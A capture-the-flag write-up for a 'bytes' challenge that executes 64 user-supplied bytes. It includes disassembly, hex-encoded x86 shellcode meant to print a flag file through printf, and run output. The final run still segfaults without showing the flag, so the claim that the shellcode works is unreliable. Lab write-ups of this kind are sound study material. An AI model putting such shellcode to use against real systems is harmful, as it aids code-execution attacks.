The Problem

Our operatives found this site, which appears to control some of the androids’ infrastructure! The robots love x86 assembly; the only thing easier for them to work with is binary. 64 bytes should be enough for anyone.
This URL is unique to your team! Don’t share it with competitors!

The link contains:

Download bytes challenge binary. 

You can send up to 64 bytes (hex encoded) as the first argument to the binary. The passed in bytes will be executed. The goal is to read the contents of the file in env\['WUNTEE\_CHALLENGE\_FLAG'\]. 

Run your input here: \[submit field\]

Upon entering anything, the following is displayed:

Shellcode location: 0xf77b8000
Flag location: 0xfff16460
Status: pid 156 SIGSEGV (signal 11) (core dumped) 

The Solution

Luckily, the binary has been provided. Per the challenge prompt, and confirmed with Radare2, 64 hex bytes were entered. If more than 64 hex bytes were entered, the binary would print “The input you provided was bad.”

The binary reads the environment variable “WUNTEE_CHALLENGE_FLAG,” which is a path to a file. The file contains the flag. If the environment variable is not set, the program will print “%s environmental variable not set. Could not read flag.\n” and exit. However, if the environment variable is set, the program will segfault at 0x080488ec.

./bytes aa
Shellcode location: 0xf773a000
Flag location: 0xffa70c40
Segmentation fault

The last valid instruction the binary executes is at 0x080488ec and is jmp dword [local_18h]. local_18h is the address of user input. For example, if 90 was passed to the binary, the program would execute nop. In order to print the flag, shellcode (x86 assembly) needs to be writeen to print the contents of the file in “WUNTEE_CHALLENGE_FLAG.”

The shellcode

0xf7706000 00:0000      90             nop
0xf7706001 00:0000      83c410         add esp, 0x10
0xf7706004 00:0000      54             push esp
0xf7706005 00:0000      681c8a0408     push str.Shellcode_location:__p_n ; 0x8048a1c ; "Shellcode location: %p\n"
0xf770600a 00:0000      ff258c9c0408   jmp dword [reloc.printf_140] ; 0x8049c8c ; "0yW\xf7\xf0\xbcX\xf7"

This shellcode (9083c41054681c8a0408ff258c9c0408) moves the contents of the file to esp, pushes esp, then pushes a string, and finally calls printf.

root@kali:bytes# ./bytes 9083c41054681c8a0408ff258c9c0408
Shellcode location: 0xf7793000
Flag location: 0xffe44560
Segmentation fault